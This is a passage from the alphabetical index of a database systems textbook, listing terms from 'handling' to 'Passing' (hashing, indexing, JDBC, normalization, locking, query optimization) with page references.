handling, 14-15, 41, 45, 403, 461, 467, 616, 674, 799,
803, 831, 841, 914, 956, 968, 1027, 1037

Hard disks, 593, 596
Hardware, 4, 13, 15, 18, 24, 34, 42-44, 47, 283, 313,

331, 334, 336, 593, 595-596, 627-629, 749,
837, 887, 909

Harmonic mean, 1016
Hash file, 611, 613, 619, 631, 633-635, 668, 702, 782
Hash functions, 614, 633, 635
Hash join, 695, 699, 701
Hash key, 592, 611, 615, 620-621, 630, 633, 691-692,

694, 718, 722
Hash table, 362, 611, 614, 695, 699-702
Hashing, 332, 588-635, 636, 640-641, 666-668, 673,

675-676, 679, 682-683, 695, 699-700, 702,
704, 716-718, 722, 730, 736-737

hash index, 668, 675, 736
hash table, 611, 614, 695, 699-700, 702
search key, 666, 668, 675, 736
typical, 592, 594-597, 602, 624, 629-630

, 423-424
Head, 423-424, 593, 596-597, 628, 630, 755, 969-970,

974, 976, 978, 980-981, 1054-1055
headers, 122, 603, 738
Heap sort, 688
Height, 208, 277, 370, 398, 963
height attribute, 208
Help, 25, 31, 37, 40, 42, 47, 56-57, 264, 318-319,

336-337, 354, 607, 631, 637, 744, 870, 909,
938, 957, 1017, 1028

Heuristic, 350, 686, 705-706, 708-709, 713-715, 724,
728, 1011

Hexadecimal notation, 88
hiding, 365, 879
Hierarchical model, 36, 50, 427
Hierarchy, 36, 50, 207, 255-259, 269-270, 275, 283,

298, 370, 372-373, 379, 389, 414, 444,
446-447, 589-591, 799, 801, 852-853, 876,
995, 1010, 1023, 1028, 1039, 1041

hierarchy of, 36, 207, 389, 589, 853, 1028
High-level languages, 311
HiPAC, 987
Histogram, 693, 718-720, 965
Hits, 284, 1014-1015, 1019-1020, 1029, 1031, 1033
Honda, 582
Host language, 36, 39-40, 51, 379, 454, 456-457, 459,

462, 471, 484-485
hotspots, 961
, 423-424
HTML, 22, 24, 420, 423-427, 437, 447-448, 490-494,

497-500, 502-503, 858, 892-893, 957, 993,
1021, 1024, 1027

HTML (Hypertext Markup Language), 420
HTML tags, 424, 493
Hubs, 627, 879, 1019-1020
Hue, 965
Hyperlinks, 22, 878, 998, 1018-1019, 1025
hypertext, 22, 420, 424, 491, 858, 1024
Hypertext Markup Language, 22, 420, 424
Hypertext Transfer Protocol (HTTP), 858

I
IBM, 33, 41, 47, 55, 83, 106, 109, 186, 188, 343,

351-352, 635, 649, 716, 745, 885, 988
Icons, 338
id attribute, 300
Identification, 205, 269-270, 274, 276-277, 325, 581,

868, 963, 965, 967, 1047
Identifiers, 106, 377, 382, 412, 425, 430, 674, 918,

961, 969
Identity management, 853, 876
IDREF, 429
IEEE, 416, 1017
Image tags, 967
images, 1, 23-24, 88, 424, 598, 600, 830, 930, 956,

958, 963-967, 982, 984, 988, 1029
quality, 967, 998

images and, 598, 958, 964, 966
Impedance mismatch, 17, 457, 484-485
Implementation, 7, 10, 29, 32, 50, 87-88, 107, 109,

130, 135, 143, 201, 203-204, 298, 313-319,
328, 331-335, 347, 350, 353, 360-361,
365-366, 371, 378, 392, 400, 406, 416, 461,
476, 702, 729, 779, 846, 873, 875, 885, 989,
1047

implements, 7, 81, 103, 456, 877, 960
IMPLIED, 123, 130, 541-542, 777
import, 466, 476-478
importing, 466
IN, 1-5, 7-26, 27-38, 40-42, 44-53, 55-67, 69-81,

82-85, 87-109, 113, 128-143, 148-158,
160-198, 201-245, 246-262, 264-285,
287-304, 309-356, 377-417, 433-442,
444-448, 454-485, 488, 490-497, 499-506,
508-533, 535-549, 564-570, 572-579,
581-586, 588-617, 619-635, 636-642,
644-649, 651-663, 665-679, 711-730,
733-746, 747-752, 754-779, 807-808,
836-876, 889-898, 900-927, 929-989,
992-1033, 1039-1049, 1050, 1052,
1054-1056

incremental backup, 41
Index scan, 690
Indexed allocation, 603
Indexing, 22-23, 35, 289, 332, 348, 436, 589, 606,

617, 636-680, 682-683, 691, 717-719, 733,
736-737, 929-930, 959-960, 964-965, 967,
982, 988, 992-995, 997-1000, 1006,
1008-1012, 1027, 1031-1032, 1041-1042

Indices, 561
Indirection, 637, 645-646, 655, 657-658, 673, 676-678
Inference, 268, 551-555, 557, 566, 574-575, 579,

582-583, 586, 838-839, 871, 968, 973, 975,
977, 979-982, 984

Inference rule, 554, 557
infinite, 971, 974, 977-978, 1020
Infinite loop, 977
Infix notation, 970-971
Information:, 312
Information extraction, 1000, 1011, 1031
Information hiding, 365
Information retrieval, 24-26, 992-1033
Information security, 842, 872
Information system (IS), 313
Information technology (IT), 7, 310
INGRES, 106, 143, 198, 741, 926
inheritance, 22, 246-247, 249, 252, 256-258, 261, 266,

274, 299, 350, 359-361, 368-374, 376,
379-380, 387, 389, 394-395, 398-400,
402-403, 409, 412-415

class hierarchies, 359-360
specialized, 22, 257
subclasses, 247, 249, 252, 257-258, 266, 274, 299

inheritance using, 395
Initialization, 594, 630
Injection attacks, 857-859, 874-875
Inner join, 123-124, 164, 172, 190, 705
INPUT, 37, 39-40, 166, 318, 328, 333, 350, 413, 461,

465, 481, 492-494, 498, 503-504, 551, 555,
557-558, 565-567, 671, 700, 705-706,
715-716, 720-721, 724, 749, 857-859, 865,
892-893, 1042-1043

tag, 500
input validation, 859
Insert, 28, 31, 36, 50, 65, 72-74, 76-77, 102-104, 106,

109, 132, 140, 365, 384-385, 387-388,
500-501, 503, 514, 576, 605-606, 610, 655,
661-663, 673, 680, 702, 734-736, 801, 838,
851, 905, 916-917, 933-935, 937-941,
949-950, 983

inserting, 74, 132-133, 255, 365, 501-502, 505, 610,
646, 660, 662, 735, 775, 932, 935

files, 610, 646, 651, 653-654, 660, 662, 735
Insertion, 35, 72-73, 79, 83, 132, 255, 514, 520, 524,

543-544, 604-605, 610, 614, 616, 619, 621,
629, 633-635, 640-641, 649, 651, 654, 656,
659-660, 662-663, 665, 674-675, 679-680,
735, 802-803, 1065

installation, 48, 85
Instance, 31, 49, 58, 62, 66, 77-78, 114, 214-215, 217,

219-220, 230-234, 236, 238, 243, 264, 269,
271, 292-293, 336, 363, 365, 369, 378-379,
386, 422, 430, 440, 448, 521, 715, 723, 967,
1007, 1043

Instance method, 375-376, 378
Instance variable, 360, 363
Instances, 27-28, 30-31, 49, 59, 214-216, 218-219,

227, 229-230, 232-234, 238, 243, 268-270,
293-294, 411, 439, 523, 552, 627, 742, 745,
962, 967

instruction set, 671
Integers, 64, 362-363, 382, 612, 977

unsigned, 382
zero and, 496

Integration, 321-323, 325-327, 350, 352-353, 355-356,
413, 877-878, 925, 1000, 1018, 1021-1022,
1035

Integrity constraints, 18-19, 26, 56, 64, 66, 69-72, 74,
76-77, 79, 85, 89-90, 92, 103-105, 110, 191,
197, 200, 289, 355, 441, 452, 570, 581, 759,
885, 985

domain constraints, 64, 72, 76, 581
enforcing, 18, 76, 581
foreign key constraints, 107

intellectual property, 868, 873, 876
intensity, 965, 967
Interaction, 1-2, 27, 38, 45, 316, 336-338, 457-458,

493, 892-893, 993, 998, 1028-1030
Interaction diagrams, 337
Interconnect, 998
Interface inheritance, 371, 387, 394, 398-399, 413-414
Interfaces, 14-15, 18, 21, 24, 27, 34, 36-38, 40, 43,

46-47, 51-52, 106, 149, 314, 336, 350, 369,
372, 383-384, 386-387, 389, 392-394, 399,
413-414, 416, 465, 482, 500, 596, 995,
1017, 1022

Comparable, 1022
Iterator, 384, 387, 389, 413-414
List, 34, 369, 372, 386, 389, 393, 413-414, 416,

482
operating system, 14, 38, 43, 46, 329

Interference, 11, 758-760, 797-798
Interleaving, 625, 749, 752, 763-765, 769, 776,

782-783
Internal Revenue Service, 3
Internet, 1, 42, 425, 447, 458, 490-491, 499, 626, 628,

853, 855, 868, 878, 914, 919-922, 1026
IP address, 499
mobile, 868

Internet and, 868
Internet Applications, 420, 425, 922
Interpreter, 195-197, 476, 491, 493-494, 499
interpreters, 490
Interrecord gaps, 597
Interrupt, 754
Intersection, 99, 149, 155-158, 164, 167, 176-177,

189-190, 260, 388, 666, 687, 692, 696-697,
702-703, 718-719, 729, 950, 953, 979, 1046

interviewing, 233
Into clause, 461-462, 468-469
Intranet, 995
Intranets, 628, 868
Introduction, 2, 26, 132, 150, 177-178, 269, 273, 355,

369, 440, 454-489, 505-506, 747-779,
836-837, 860-861, 872, 892, 919, 929, 955,
968, 981-982, 992-1033

history, 759-760, 776-777, 982, 993, 997,
1029-1030

Inverted index, 999-1001, 1006-1007, 1011-1013,
1031

I/O (input/output), 595, 716
IP (Internet protocol) address, 499
Isolation, 12, 524, 627, 747, 758-759, 765, 774-778,

882
Item, 1, 5, 8-10, 16, 19, 30-31, 33, 78-79, 242, 283,

546, 581, 600, 734, 744, 750-754, 757, 760,
762-768, 770, 772-773, 777, 780-799, 801,
803-805, 809, 812-823, 830-835, 893, 905,
910-912, 962, 1026

Iterate, 387, 474
Iteration, 338, 700, 1000
Iterator, 93, 384, 387-389, 403-405, 409-411, 413-414,

457, 462, 468-470, 479, 484, 504
Iterator interface, 388
iterators, 384, 468-470, 485

cursor, 468, 485
interface Iterator, 384

J
Jackson, Michael, 963
Java, 17, 40, 45, 83, 105, 352, 394, 402, 454-455,

457-459, 466-471, 476-480, 484-486, 500,
892

Class Library, 484
keywords, 459, 468

Java code, 467
Java database programming, 471

JDBC, 471
JavaScript, 424, 454, 491, 505

strings in, 505
JDBC, 45, 56, 105, 466, 471, 476-480, 482, 484-486,

500, 892-893
drivers, 45, 466, 476
loading, 476

Job, 12-13, 138, 205, 233, 249, 253, 265, 271-272,
297-298, 501, 503-504, 600-601, 604, 606,
609, 612, 632, 677-678, 681, 734, 738,
850-851, 942

Join:, 162, 164
Join operation, 123, 160-164, 172-173, 181, 189, 194,

292, 294, 440, 514, 518, 532, 572, 698-701,
704-705, 711-712, 714-715, 720-724, 727,
729-730, 736, 896, 961

Join ordering, 723-724
Join selectivity, 163, 698, 720-722

K
Kernel, 909
Key access, 668, 675
Key distribution, 865
Key field, 608-611, 629, 633, 637-640, 642, 644-645,

649-650, 654-657, 659-660, 666, 676-678,
691-692, 718

keyboard, 282, 628
Keys, 37-38, 69, 73, 76-77, 79-80, 85, 87, 90-91, 107,

131, 205, 209, 216, 234-235, 241, 289-295,
299-301, 346, 350, 354, 377, 392, 400-401,
413-414, 427, 430, 496-497, 523-526, 530,
535, 543-544, 546, 550, 552, 573, 586, 619,
621, 637-638, 665-668, 674-676, 734,
864-866, 896-898, 1060-1061

candidate, 65-66, 76-77, 524, 526, 530, 532-533,
535, 543, 546, 548, 552, 558, 573

Sense, 241
keystrokes, 37-38

L
Languages, 14, 17-18, 21-22, 27, 34-38, 49, 51, 62,

66, 70, 83, 105, 119, 150, 177, 188, 198,
211, 245, 249, 258, 265, 273, 277, 329,
358-360, 362-363, 365, 371, 374, 382, 394,
402, 411, 416, 420-421, 424-425, 457-459,
484, 499-500, 886, 955, 971, 1024

Laptops, 897, 995
late binding, 361
Latency, 591, 595-596, 634
layers, 46, 892, 957

shape, 957
Layout, 338
layouts, 351
Leading, 22, 34, 45, 106, 164, 246, 258, 359, 362,

368, 412, 446, 496, 509, 617, 760-763, 767,
788, 803, 855, 904, 938, 989

Leaf, 166-167, 257-258, 266, 422, 427, 429, 436-437,
619-620, 651-652, 657-662, 664-665, 671,
673, 675-676, 678-679, 683, 703, 706-707,
713-714, 725-726, 745, 960

legacy systems, 622, 685
Lexicographic order, 1013
Libraries, 336, 466, 476-477, 484, 491, 500, 505, 627,

929, 993-994, 997, 1017, 1029-1030, 1032
licensing, 51

open source, 51
life cycles, 353
LIKE, 25, 33, 37, 47-48, 52, 55, 100, 142, 218, 229,

280, 303, 311, 328, 350-351, 428, 465, 546,
551, 629, 678, 688, 742, 745, 762, 773, 793,
866, 884, 914, 916, 958, 960, 987, 1006,
1019-1020, 1024, 1047-1048, 1058-1059

Line:, 461, 476
line comments, 492
Line numbers, 459, 491
Linear hashing, 617, 619-621, 630, 633-635, 673, 718,

722
Linking, 49, 332, 1019, 1022
links, 229, 319, 825, 883, 910, 917-919, 996, 1011,

1019-1020, 1023, 1027
IDs, 996, 1011

Linux, 491, 626
LISP, 372
List, 3, 7, 12, 25, 34, 49, 58, 60, 63, 72, 75, 95, 97,

101-102, 107, 129, 134, 152-153, 158,
162-163, 167-170, 175-176, 181-183,
185-195, 236, 239, 254-255, 262, 275-277,
284-285, 354, 358, 369, 372-374, 377-378,
385-386, 388-389, 393, 401-402, 405-407,
409-411, 413-414, 416, 422-424, 429, 448,
485, 547-548, 614-615, 640, 665, 701-702,
815-816, 819-820, 822-824, 873, 924, 926,
951-952, 956, 961, 986-987, 999-1000,
1060-1061

Lists, 36, 84, 102, 129, 163, 166, 276, 351, 388, 409,
495, 549, 585, 615, 637, 688, 822, 831,
895-896, 905-906, 922, 1017, 1061

Literal, 87-88, 93, 100, 381-382, 386-387, 411, 495,
971-973, 982

Literal value, 362-363, 386
Load balancing, 623-624, 1045
Load factor, 621, 630, 635
Loading, 40-41, 103, 314, 333, 476, 592, 1026, 1036,

1043-1044
Local Area Network (LAN), 628
local data, 916
Local server, 493
Local variable, 482
localization, 882, 901
locations, 23, 42, 66-68, 71, 86, 90-91, 110-111,

143-146, 162-163, 199-200, 205-206,
212-213, 227, 229, 288-290, 293, 301, 305,
364, 366, 390-391, 419, 449-452, 486,
511-513, 526-528, 587, 607, 613-615,
617-618, 676, 731-732, 898, 927-928,
960-961, 990, 1059

Lock table, 782-783, 785, 788, 799
locked state, 785
Locking, 386, 740, 772, 780-787, 789, 791-792,

794-801, 803-808, 822, 863, 909-911, 925
Locking protocol, 772, 785-787, 800, 805-807, 822,

911
Locks, 740, 781-786, 788, 790-792, 795-796, 799-801,

803-807, 819, 908-912
Log record, 757, 814, 825-828, 833
Logic programming, 968, 975, 989
Logical operators, 179
login credentials, 856
Lookup, 291, 385, 389, 394, 726, 1012
Lookup table, 291, 1012
Loop, 315, 457, 460-463, 470, 475, 480, 483, 497,

503-504, 555, 562, 567, 694-695, 698-700,
704, 715, 721-723, 726, 977

loops, 316, 329, 456, 458, 462, 480, 483, 495, 694,
715

prompt, 462
Lossless join, 525, 561-563, 566, 574, 584, 586
Lost update problem, 752-753, 762, 765
low-level, 28-29, 36, 40, 50, 812, 965

M
machine, 42-44, 277, 339-340, 458, 480, 909, 915,

994, 1025
Magnetic disks, 29, 588-593, 629
Magnetic tape, 588, 592, 597, 829
Mail servers, 43
main function, 981
Main memory, 17, 40, 589-592, 595, 597-598,

603-605, 611, 644, 688-690, 695, 698-699,
701, 716-717, 719, 721, 723, 750, 757-758,
811-812, 814-815, 821-824, 835, 881, 1054,
1056

maintainability, 1045
Mandatory access control (MAC), 848, 872
Manufacturing, 1, 22, 24
Many-many relationship, 197
Many-to-many relationship, 566
Map, 34, 280, 287, 291-293, 301-302, 317, 362, 394,

401-402, 413, 415, 457, 523, 543, 667, 672,
943, 956-958, 962, 1018

mapping, 23, 32-35, 38, 56, 60, 62, 92, 203-204,
287-308, 315-317, 332, 347-348, 350-353,
394, 399-402, 415, 436, 447, 508-510, 543,
550, 896, 901, 914-915, 926, 1023

value, 60, 62, 211, 291, 294-295, 297-298, 300,
351, 400, 543, 914, 1023

Maps, 1, 23, 25, 277, 613-614, 852, 955-956, 963, 998
margin, 903
markers, 338, 610, 629, 640
Marketing, 24, 28, 1026
Markov model, 1020
Markup language, 22, 47, 420-448, 450-453
markup languages, 424, 1021

Mass storage, 41, 590
Master file, 610, 629
Materialization, 135, 724, 729
Materialized view, 136, 516
math, 5-6, 54, 112, 147, 487
Matrices, 1012, 1037
Matrix, 561-563, 584, 626, 801, 807, 844, 965, 999,

1037-1038
singular, 965
translation, 965

Maximum, 70, 87-88, 125, 169, 171, 218-219, 229,
235, 243, 283, 312, 363, 377, 409, 434, 601,
615, 619, 621, 792, 871-872, 955

Maximum value, 125, 792
Mean, 2, 57, 62, 125, 198, 226, 362, 371, 389, 414,

554-555, 624, 713, 767, 832, 944, 962, 970,
1016

measurement, 57, 350, 956, 1029
Media, 1, 28, 313, 598, 754, 834, 967, 982, 997, 1028

guided, 1028
Median, 485, 1025
Megabyte, 595
Member, 49, 158, 179, 209, 214, 247-249, 257-258,

260, 262, 264, 269, 283, 298, 397, 408-409,
411, 526-527

Memory, 17-18, 40, 43, 60, 282, 329, 411, 589-592,
595, 597-598, 602-605, 607, 611, 623, 625,
629, 635, 644, 688-690, 694-695, 698-702,
716-723, 727, 750, 811-812, 821-824, 835,
862-863, 879, 881, 959, 1054

allocation, 603, 607
features, 623
flash, 590, 635
operations of, 411, 690, 754, 757, 811-812,

821-822
secondary, 589-592, 597, 607, 623, 629, 635, 644,

695, 698, 716-717, 719-722, 727, 881,
887, 959

memory cards, 590
Memory hierarchy, 590-591
Memory management, 411
Menus, 36-37, 201, 331, 495, 1065
Merge algorithm, 688-689, 729
Messages, 19, 337-338, 424, 502, 818, 865, 887, 912,

930, 963-964, 982, 993-994
reliability, 881
response, 912, 993

Metadata, 728, 877, 883, 885, 891, 913-914, 919, 925,
967, 988, 996-997, 1000-1001, 1011, 1024,
1028, 1036, 1044-1045

3D objects, 988
Metal, 1028
Method, 10, 57, 164, 189, 227, 235, 249, 265, 285,

360-361, 365-367, 369-373, 375-378, 402,
406, 414, 420, 455, 494, 496, 498, 567, 606,
610-611, 613-614, 624, 629-630, 650, 664,
667, 674, 682, 691-695, 698-699, 718-724,
726, 728, 791, 804, 806-808, 818-821, 823,
831, 843, 848, 909-912, 925, 997, 1025

Add, 10, 265, 367, 629, 674, 728, 804
Exists, 371-372, 496, 498, 567, 636, 692-694,

721-722, 791, 848
methods, 48, 130, 137, 164, 235, 285, 319, 321, 329,

334, 342, 345, 358, 360, 372-374, 378-379,
401-402, 406, 412-413, 415, 454, 606, 673,
690-694, 714, 719, 722, 724, 729, 758, 771,
776, 797, 807-808, 818, 830-831, 863, 908,
910-912, 976, 997, 1005, 1023-1025, 1043

class name, 401
definitions, 360, 373, 776, 863
driver, 466, 476
fill, 673
get, 342, 693, 722, 767, 818
responsibility, 912
turn, 374, 466, 476, 588
valued, 401

Metrics, 992, 1014-1015, 1029
Microprocessors, 622-623
Microsoft Access, 2, 48, 1058
Microsoft SQL Server, 501, 915
Millisecond, 383-384
Minimum, 88, 125, 169, 188, 194, 219-220, 235, 283,

350, 434, 509, 626, 662, 700, 735, 797, 854,
861, 872, 890, 960, 1058

Mod, 607, 611-614, 619, 621, 625, 633, 701, 866
Mode, 481, 684-685, 783, 795, 799-803, 805, 838,

869, 887
Model Tree, 427
Modeling, 15, 22-23, 29, 56, 75, 201-245, 246-247,

249, 259, 261, 268, 272-275, 283-285, 303,
320, 322-323, 328-329, 332, 334-335, 340,
343-345, 348, 351-352, 355-356, 381, 481,
885, 965, 967, 988, 999-1000, 1026, 1050

theory, 56, 273, 988
Models, 11, 22-23, 27-30, 33, 47-51, 53, 56, 61-62,

106, 216, 236, 246-247, 258, 268-269, 271,
273, 285, 287, 295, 304, 320, 334-336,
352-353, 355-356, 360, 362, 367-368, 373,
416-417, 424, 441, 621, 746, 808, 867,
885-886, 915, 924, 929-989, 991,
1005-1008, 1022, 1029-1030, 1032,
1050-1052

activity, 11, 28, 335, 348, 961, 1029
behavioral, 335-336, 352
interaction, 27, 336, 1029-1030
semantic data, 246-247, 268-269, 271, 285, 356
structural, 202, 236, 271, 285, 287, 335-336, 352,

1005
use case, 335-336, 352

Modem, 283
Modes, 318, 795-796, 801, 993, 998, 1029-1030
Modular design, 1044, 1048
Module, 17-18, 23, 27, 38, 40, 436, 500, 686, 759,

783, 897, 905
Modules, 11, 14, 23, 27-28, 38-40, 45-46, 51, 83, 105,

458, 480-482, 893, 907, 920-921, 994
MOLAP, 1046, 1048
Monitor, 3, 35, 43, 132, 282, 455, 465, 628, 739,

803-804, 940-941, 1058
Monitors, 41, 331
Mouse, 37, 282, 628
move, 281, 311, 330, 399, 438, 464, 615-616, 627,

640, 661-662, 713-714, 767, 842, 908
Movie database, 244
movies, 23, 242-244, 930, 963, 982
MP3, 590
MTBF (mean time between failures), 624
Multimedia, 1, 22, 83, 627, 929-930, 963, 965-967,

981-983, 987-988, 993-994, 996
image, 963, 965-967, 988

Multiple, 4, 8, 11, 14-16, 18, 25, 31, 42-43, 45-47, 88,
97, 103, 105, 124, 135-137, 164, 173, 209,
233, 239, 241, 243-244, 256-258, 269-270,
281, 289, 295-297, 299, 311-312, 338, 351,
371-373, 387, 394, 405, 414, 438-439, 442,
446-447, 461-463, 465, 468, 479-480, 495,
509, 528-529, 547-548, 588, 614, 625-628,
636-637, 665-666, 674-676, 691-692,
718-719, 723, 741-745, 747-749, 794-795,
797-801, 806-808, 828, 849-850, 878-880,
882-883, 886-887, 890, 897, 909-910, 926,
960, 970, 989, 1022-1023, 1026-1029,
1042-1043

declarations, 8
Multiple inheritance, 252, 256-258, 299, 372-373, 387,

394, 399, 414
Multiplication, 101
Multiplicity, 228-229, 275, 356, 434
Multiprogramming, 748, 863
multiuser, 8, 11, 15, 20, 47, 748-749, 776, 819-820,

822-824, 830-831, 838, 1037
Multivalued dependency, 510, 538, 540-541, 544, 551,

575, 578, 584
Mutator, 378
Mutual exclusion, 781, 852, 872-873, 876
MySQL, 48, 55, 106, 311, 491, 500-501, 746

N
name attribute, 65-66, 80, 211, 213, 223, 229, 434,

493
named, 85, 91, 109, 138-139, 176, 192-194, 367-368,

371, 378, 380, 394, 403-404, 406-408, 412,
414, 468-470, 708, 750-751, 798, 866, 936,
941, 1011

names, 2-3, 7-8, 10, 20, 30, 38, 56-59, 62-63, 65, 67,
91-93, 95-97, 99, 103, 107-108, 117-123,
134-135, 141-142, 154-158, 162, 170, 173,
175-176, 178, 183, 185, 188, 190-192,
195-197, 202, 214-215, 217, 223-224,
227-230, 239, 244, 270, 356, 360-361,
381-382, 391, 403-406, 408, 412, 425-429,
437-438, 440, 447, 459-460, 468-470, 483,
499-500, 595, 684, 905-906, 922, 968-969,
971-972, 979, 1006-1007, 1058-1060, 1063

Namespace, 434
namespaces, 433
Naming conventions, 223, 236, 354
NASA, 591

National Library of Medicine, 1009-1010
Natural join, 123-124, 162-164, 167, 172, 175, 177,

189, 194, 294, 514-515, 518-519, 542, 546,
559-561, 570-572, 694, 738

Natural language processing, 1018
navigation, 50, 653, 892, 1017, 1020, 1023, 1025,

1027-1028
Negation, 183, 185, 471, 670, 975, 1063-1064
Neighborhood, 963
Nested, 49, 61, 102, 105-106, 115, 117-122, 126,

129-130, 139, 141, 164, 195, 208, 235, 237,
408, 422, 428-429, 438, 528-529, 686-687,
694-695, 698, 721, 723, 726, 730, 742-743,
926, 989

Nested relation, 164, 528-529, 532
Nested-loop join, 694-695, 698, 700, 704, 721, 723,

726
nesting, 121, 130, 208, 362, 374, 412, 528
Network, 21-22, 29, 40-41, 43-44, 46-47, 49, 56, 82,

334, 399, 416, 598, 605, 622, 627-628,
630-631, 754, 828, 839, 877-880, 882-883,
885, 887-889, 901-902, 910, 913, 916-919,
924-925, 956, 995-996, 1009-1010, 1043

Network management, 416
Network model, 21, 49, 399
Network security, 47
networking, 878, 1018

data communications and, 878
networks, 27, 42, 44, 47, 588-589, 598, 626-631, 855,

868, 879, 881-882, 902, 924, 930, 958, 988,
1028, 1046

New York Stock Exchange, 955
next(), 469-470, 477-479, 485
Next Page, 679
Nodes, 166-168, 182, 257-258, 266, 336, 422, 427,

437-439, 619, 627, 651-652, 654-660, 662,
664-665, 671, 675-676, 678-679, 706-708,
713-714, 728, 745, 767-768, 800-803,
862-863, 878-879, 881, 887, 915-916, 957,
962, 980

children, 438, 801
descendants, 800
levels, 427, 438, 651-652, 656-658, 665, 675, 678,

803, 862-863
subtree of, 651-652

Noise, 861, 867-868, 962, 966, 995, 1023
reducing, 966

NOR, 30, 74, 98, 213, 259, 386, 401, 497, 519,
530-532, 540, 788, 794, 903, 994

Normal, 61, 152, 170, 350, 509-510, 520, 523-528,
532-533, 535-545, 547-549, 550-552,
558-559, 575, 578-579, 581-584, 586, 591,
742, 826, 869, 950, 989, 1041

Normalization, 16, 56, 64, 350, 508-549, 550, 552,
559-562, 564, 567-568, 572-573, 576-578,
581-586, 737, 741, 988, 1003

normalizing, 529, 531, 541, 548, 584, 1041
Notation, 49, 52, 56, 58, 61-63, 88, 166-167, 169-170,

178, 182, 187, 194, 201-202, 205-206,
210-211, 225-230, 234, 247-248, 253-254,
266-267, 274-275, 284, 306-307, 317,
319-320, 328, 334-340, 344-345, 347-350,
355-356, 364, 377, 380, 386-387, 394-395,
402, 404, 415, 429, 480, 513, 523, 552-553,
579, 600, 706-707, 760, 801, 932-934,
938-940, 968-971, 982, 984, 1050, 1052

null character, 460
NULL pointer, 473, 612, 643, 652
Number class, 6, 30, 54, 112-113, 147, 487-488
Numbers:, 165
Numeric data, 64, 87

O
Object:, 339, 370

oriented programming, 17, 22, 249, 265, 358-359,
367, 380, 411, 476

use an, 33, 45, 106, 204, 405
object classes, 269, 401
object element, 384-385
Object Management Group (OMG), 334
object-oriented, 10-11, 17, 22-23, 28, 33, 45, 53, 84,

106, 249, 259, 265, 320, 334-335, 339-340,
348, 355, 357-360, 367, 371, 380, 411-414,
416, 459, 466, 471, 476, 588, 621, 989,
1024, 1043

requirements analysis, 334
Object-oriented design, 334
Object-oriented model, 33
objects, 10, 17, 22, 24-25, 28, 35, 45, 229-230, 259,

266-271, 277-278, 335-339, 344, 357-365,
367-368, 370-374, 377, 381-383, 386-390,
392-395, 399, 401-407, 409-417, 420, 422,
424, 447, 478-479, 484, 600, 621-622,
854-856, 861-863, 880, 913, 916, 943, 951,
955-964, 966, 982-984, 988, 1024

distance of, 959, 966
grouping, 409-410, 414, 943, 964, 966
manager, 229, 247, 259, 364, 372, 390, 392, 852,

984
script, 424
state of, 360, 390, 996
template, 266, 411
visible, 360-361, 365, 849, 856

ODBC, 45, 56, 105, 471, 485, 500-501, 892-893, 916
Offsets, 1007, 1011
OLAP, 1, 83-84, 106, 1026, 1034-1049
OLTP, 11, 48, 75, 1035
OPEN, 45, 48, 51, 55, 105-106, 393, 455, 458,

462-464, 471, 490-491, 505, 604-605,
613-614, 918, 955, 958

Open addressing, 613-614
Open source, 48, 51, 55, 490-491, 505
Open source software, 51
opening, 312, 495
Operand, 407
Operands, 166, 371, 705-706, 959
Operating system, 14, 17, 38, 46, 55, 329, 332, 334,

491, 594, 628, 740, 750, 769, 812, 857, 882,
887, 909, 920

Operating system (OS), 38, 909
operating systems, 491, 537, 746, 751, 782, 812-813,

835, 863, 922, 998
execution of, 748

Operations, 10-12, 19, 22-23, 26, 28, 30-32, 35, 37,
39-40, 48, 62, 71-72, 75-77, 81, 82, 99-100,
106, 117, 124, 133-134, 148-152, 154-158,
163-169, 171-175, 177, 182-183, 188-190,
193-195, 197, 202-204, 229-230, 245,
265-266, 268, 294-295, 298, 336, 340, 342,
347, 357-360, 365-369, 371-374, 378-380,
386-392, 399-402, 408-409, 411-415, 469,
484, 517-518, 520, 543, 604-606, 624,
630-631, 635, 686-687, 690, 701-709,
711-714, 716, 720-724, 726, 728-730, 738,
748-752, 754-773, 776-777, 780-786,
792-794, 799, 801-804, 811-812, 815-822,
824-825, 829-834, 840-841, 862-863, 918,
943, 952-953, 956-957, 959-961, 978-979,
981-982, 984, 988, 1026, 1031, 1045-1046

operator overloading, 360, 371, 373, 414
Optimistic concurrency control, 797, 806-807
optimization, 18, 22, 39, 45, 55, 61, 82-83, 130, 183,

348, 589, 684-730, 732, 897, 901-903, 918,
920, 924-925, 979, 981-982, 997

search engine, 997, 1027
Optimizer, 39, 183, 684-687, 692-693, 703, 708, 711,

715-721, 723-728, 744-745, 889-890, 907,
918

OR function, 481-482, 551
Oracle:, 478
Orders, 60, 177, 192-193, 196, 243, 464, 672,

723-724, 729, 760, 764, 766, 852, 863, 918,
1037

Orthogonality, 413, 415
OUTPUT, 37, 39-40, 318, 328, 333, 481, 595, 705,

716, 749, 865, 892, 1042, 1059
Overflow, 610, 612-617, 619-621, 629-630, 633-634,

640, 649, 661-663, 680, 754
Overflows, 617, 620, 662, 741, 960
overhead costs, 24-25
Overlap, 20, 842, 997
Overlapping subclasses, 298, 1052
Overloading, 360, 371, 373, 379, 414, 911

P
Packet, 628
packets, 628-629
Padding, 173
page, 2, 421-422, 425, 490, 493, 500, 505, 679, 723,

741, 799-801, 803, 805, 812-815, 823-828,
831, 858-859, 999, 1017-1022, 1024-1025,
1027, 1033

Page numbers, 422, 637
Page tables, 812, 827
pages, 22, 24, 37, 40, 45-46, 140, 276, 333, 420-423,

425, 490-491, 493-494, 504, 594, 637,
740-741, 745, 779, 799-801, 812-814,
823-826, 828, 830, 892, 993-996, 998-999,

1004-1005, 1008, 1011, 1017-1027, 1031
extracting, 1011, 1018
first, 421, 425, 490-491, 493-494, 779, 799-800,

812-814, 825-826, 830, 999, 1021
last, 491, 504, 814, 825-826, 828, 830

Paging, 739, 810, 823-824, 829-831, 835
page replacement, 835

panels, 1023
paper, 55, 81, 244-245, 277, 304, 416, 635, 730, 875,

989, 1032
paragraphs, 993, 1005
Parallel processing, 48, 749, 761, 1046
parallelism, 623, 882
Parameter, 333, 473-474, 479, 481-482, 485, 717,

754, 858-859, 1054, 1056
Parameters, 10, 35, 37-38, 40, 48, 105, 204, 230, 328,

332-333, 379, 406, 456, 465, 468, 472-475,
479, 481, 484, 492-493, 500, 631-632,
717-718, 729, 740, 752, 1004-1005, 1025,
1054-1056

Parent, 36, 50, 221, 245, 256, 346, 428, 435, 437-438,
605, 659-662, 665, 802-803, 871, 986

Parent class, 346
Parity, 623-626
Parity bits, 624-625
Parser, 684, 705, 708
Parsing, 684-685, 1008, 1025
Partitioning, 410, 637, 668, 674, 695, 699-701,

741-742, 861, 895, 910, 914, 921, 923,
1044-1045

Pascal, 17, 612
Passing, 46, 359-360, 848, 859
